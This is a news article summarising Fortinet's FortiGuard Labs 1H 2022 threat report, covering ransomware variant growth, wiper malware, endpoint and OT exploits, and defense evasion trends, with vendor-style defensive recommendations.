Ransomware variants almost doubled in six months: Report

News Desk -

Share

Fortinet®, a global provider of comprehensive, integrated, and automated cybersecurity solutions, has released the latest FortiGuard Labs Global Threat Landscape Report.

“Cyber adversaries are advancing their playbooks to thwart defense and scale their criminal affiliate networks,” says Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, FortiGuard Labs. “They are using aggressive execution strategies such as extortion or wiping data as well as focusing on reconnaissance tactics pre-attack to ensure better return on threat investment. To combat advanced and sophisticated attacks, organizations need integrated security solutions that can ingest real-time threat intelligence, detect threat patterns, and correlate massive amounts of data to detect anomalies and automatically initiate a coordinated response across hybrid networks.”

Highlights of the 1H 2022 report follow

  • The ransomware threat continues to adapt with more variants enabled by Ransomware-as-a-Service (RaaS). 
  • Work-from-anywhere (WFA) endpoints remain targets for cyber adversaries to gain access to corporate networks. Operational technology (OT) and information technology (IT) environments are both attractive targets as cyber adversaries search for opportunities in the growing attack surface and IT/OT convergence.
  • Destructive threat trends continue to evolve, as evidenced by the spread of wiper malware as part of adversary toolkits.
  • Cyber adversaries are embracing more reconnaissance and defense evasion techniques to increase precision and destructive weaponization across the cyber-attack chain.

Ransomware Variant Growth Shows Evolution of Crime Ecosystems: Ransomware remains a major threat, and cyber adversaries continue to invest heavily in new attack techniques. FortiGuard Labs has seen a total of 10,666 ransomware variants in the last six months, up from just 5,400 in the previous six months. In half a year, ransomware variants have increased by nearly 100%. RaaS’s popularity on the dark web fuels a criminal industry that forces organizations to consider ransomware settlements. To combat ransomware, organizations of all sizes and industries must take a proactive approach. It is critical to have real-time visibility, protection, and remediation, as well as zero-trust network access (ZTNA) and advanced endpoint detection and response (EDR).

Exploit Trends Show OT and the Endpoint Are Still Irresistible Targets: As adversaries continue to target the expanding attack surface, the digital convergence of IT and OT, as well as the endpoints that enable WFA, remain key vectors of attack. Many endpoint vulnerability exploits involve unauthorized users gaining access to a system with the goal of lateral movement into corporate networks. For example, a spoofing vulnerability (CVE 2022-26925) and a remote code execution (RCE) vulnerability were both prioritized (CVE 2022-26937).

In addition, analyzing endpoint vulnerabilities based on volume and detections reveals the relentless path of cyber adversaries attempting to gain access by exploiting both old and new vulnerabilities. Furthermore, when it comes to OT vulnerability trends, the sector was not spared. In-the-wild exploits were discovered on a wide range of devices and platforms, demonstrating the cybersecurity reality of increased IT and OT convergence and adversaries’ disruptive goals. At an early stage of an attack, advanced endpoint technology can help mitigate and effectively remediate infected devices. Furthermore, services such as a digital risk protection service (DRPS) can be used to perform external surface threat assessments, identify and resolve security issues, and provide contextual insights into current and emerging threats.

Destructive Threat Trends Continue With Wipers Widening: Wiper malware trends show a disturbing evolution of more destructive and sophisticated attack techniques, with malicious software that wipes data clean. The conflict in Ukraine fueled a significant increase in disk wiping malware among threat actors targeting critical infrastructure.

In the first six months of 2022, FortiGuard Labs identified at least seven major new wiper variants that were used in various campaigns against government, military, and private organizations. This figure is significant because it is close to the number of publicly detected wiper variants since 2012. Furthermore, the wipers were detected in 24 countries other than Ukraine, rather than just one. To reduce the impact of wiper attacks, network detection and response (NDR) with self-learning artificial intelligence (AI) can help detect intrusions more effectively. Backups must also be stored off-site and offline.

Defense Evasion Remains Top Attack Tactic Globally: Examining adversarial strategies reveals insights into the evolution of attack techniques and tactics. FortiGuard Labs examined the functionality of detected malware over the last six months to identify the most common approaches. Defense evasion was the most commonly used tactic by malware developers among the top eight endpoint-focused tactics and techniques. They frequently use system binary proxy execution to accomplish this. One of the most important things for adversaries is to conceal malicious intentions. As a result, they are attempting to circumvent defenses by masking them and concealing commands that use a legitimate certificate to execute a trusted process and carry out malicious intent.

Furthermore, process injection was the second most popular technique, in which criminals work to inject code into the address space of another process in order to evade defenses and improve stealth.

Organizations will be better positioned to defend against adversaries’ broad toolkits armed with this actionable intelligence. To protect hybrid networks across all edges, integrated, AI and ML-driven cybersecurity platforms with advanced detection and response capabilities powered by actionable threat intelligence are essential.

AI-powered Security Across the Extended Attack Surface 

Organizations can better align defenses to adapt and react to rapidly changing attack techniques when they gain a deeper understanding of adversaries’ goals and tactics through actionable threat intelligence. Threat intelligence is critical for prioritizing patching strategies to improve security in environments. To keep employees and security teams up to date as the threat landscape changes, cybersecurity awareness and training are also essential. To keep up with the volume, sophistication, and rate of today’s cyber threats, organizations require security operations that can operate at machine speed. AI and machine learning-powered prevention, detection, and response strategies based on a cybersecurity mesh architecture enable much tighter integration, increased automation, and a faster, coordinated, and effective response to threats across the extended network.

Report Overview

This latest Global Threat Landscape Report represents FortiGuard Labs’ collective intelligence, drawn from Fortinet’s vast array of sensors that collected billions of threat events observed around the world during the first half of 2022. The FortiGuard Labs Global Threat Landscape Report uses this model to describe how threat actors target vulnerabilities, build malicious infrastructure, and exploit their targets, similar to how the MITRE ATT&CK framework classifies adversary tactics and techniques, with the first three groupings spanning reconnaissance, resource development, and initial access. In addition, the report discusses global and regional perspectives, as well as threat trends affecting IT and OT.


Leave a reply